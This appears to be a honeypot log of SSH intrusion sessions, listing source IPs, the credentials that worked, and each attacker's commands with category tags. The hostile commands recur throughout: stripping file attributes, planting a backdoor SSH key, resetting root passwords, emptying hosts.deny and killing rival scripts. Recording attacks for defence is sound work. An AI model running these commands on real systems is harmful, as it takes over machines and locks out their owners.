$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 windmill_root_10 (212.86.125.138) β€” Haarlem, Netherlands Β· 1 session Β· 2 cmds
2026-05-16 18:27 EDT Β· as root/1nt3rn3t
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 capoeira_root_14 (69.6.220.104) β€” SΓ£o Paulo, Brazil Β· 1 session Β· 2 cmds
2026-05-16 18:26 EDT Β· as root/Qwer@1234
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 rogue_root_108 (129.226.206.229) β€” Singapore, Singapore Β· 1 session Β· 2 cmds
2026-05-16 18:24 EDT Β· as root/20192019
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 wraith_root_8 (186.68.83.105) β€” La Puntilla, Ecuador Β· 2 sessions Β· 22 cmds
2026-05-04 07:15 EDT Β· as admin/vikram, root/20192019
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "vikram\nue1CYzT220jh\nue1CYzT220jh"|passwd|bash
$ Enter new UNIX password:
$ echo "vikram\nue1CYzT220jh\nue1CYzT220jh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_54 (192.169.201.223) β€” Tempe, United States Β· 4 sessions Β· 8 cmds
2026-05-16 15:09 EDT Β· as root/1qazxsw21qazxsw2, root/20192019, root/db2das1
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
🎭 yankee_root_46 (49.51.197.52) β€” Santa Clara, United States Β· 1 session Β· 2 cmds
2026-05-16 16:55 EDT Β· as root/20192019
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 rogue_root_109 (152.32.175.179) β€” Hong Kong, Hong Kong Β· 4 sessions Β· 8 cmds
2026-05-16 15:09 EDT Β· as root/1qazxsw21qazxsw2, root/db2das1, root/harley1
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
🎭 burger_root_59 (43.130.57.37) β€” Santa Clara, United States Β· 2 sessions Β· 4 cmds
2026-05-16 15:09 EDT Β· as root/909090, root/mcintosh
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 rogue_root_22 (103.186.31.66) β€” Ciampea, Indonesia Β· 4 sessions Β· 42 cmds
2026-05-08 10:18 EDT Β· as root/909090, root/Qw321, root/mcintosh
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:iMVDB7tJeQNQ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:Cqc85EvaJWAg"|chpasswd|bash
🎭 liberty_root_47 (43.173.122.127) β€” Santa Clara, United States Β· 2 sessions Β· 4 cmds
2026-05-16 15:08 EDT Β· as root/909090, root/mcintosh
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 lantern_root_34 (14.18.122.240) β€” Guangzhou, China Β· 2 sessions Β· 5 cmds
2026-05-07 03:16 EDT Β· as root/909090, ubuntu/1q2w3e4r5
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
🎭 jade_root_26 (42.123.126.29) β€” Beijing, China Β· 1 session Β· 2 cmds
2026-05-16 15:01 EDT Β· as root/1qazxsw21qazxsw2
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 wok_root_26 (106.75.166.71) β€” Yangpu, China Β· 1 session Β· 1 cmd
2026-05-16 13:43 EDT Β· as root/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 dutch_sol_6 (193.32.162.145) β€” Amsterdam, The Netherlands Β· 2 sessions Β· 2 cmds
2026-05-11 08:58 EDT Β· as solana/solana, ubuntu/ubuntu
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m Γ—2 // obfuscated system check
🎭 wraith_root_90 (213.135.168.228) β€” Prilep, North Macedonia Β· 3 sessions Β· 6 cmds
2026-05-16 09:58 EDT Β· as root/admin321, root/sammy123, root/warnightkardesim
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 sakura_root_8 (160.251.169.213) β€” Chiyoda City, Japan Β· 3 sessions Β· 23 cmds
2026-05-16 10:03 EDT Β· as root/victory1, root/warnightkardesim, root/zxcvbnm!@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:eACqKXlT9poz"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_44 (43.153.54.120) β€” Santa Clara, United States Β· 3 sessions Β· 6 cmds
2026-05-16 09:55 EDT Β· as root/admin321, root/sammy123, root/warnightkardesim
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 burger_root_60 (43.153.11.253) β€” Santa Clara, United States Β· 2 sessions Β· 4 cmds
2026-05-16 09:56 EDT Β· as root/warnightkardesim, root/zxcvbnm!@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 acai_root_9 (200.196.50.91) β€” Rio de Janeiro, Brazil Β· 1 session Β· 2 cmds
2026-05-16 09:50 EDT Β· as root/zxcvbnm!@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 lantern_root_35 (121.229.191.90) β€” Nanjing, China Β· 1 session Β· 2 cmds
2026-05-16 09:45 EDT Β· as root/warnightkardesim
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 cipher_root_90 (103.78.1.33) β€” Thanh XuΓ’n, Vietnam Β· 2 sessions Β· 38 cmds
2026-05-16 06:40 EDT Β· as root/super123456, root/warnightkardesim
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:LvamXKBYZMMt"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:NCYpvhoVJjzd"|chpasswd|bash
🎭 cipher_root_91 (43.156.71.43) β€” Singapore, Singapore Β· 2 sessions Β· 39 cmds
2026-05-06 11:17 EDT Β· as root/warnightkardesim, ubuntu1/ubuntu
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:zYrzem2ngnsy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
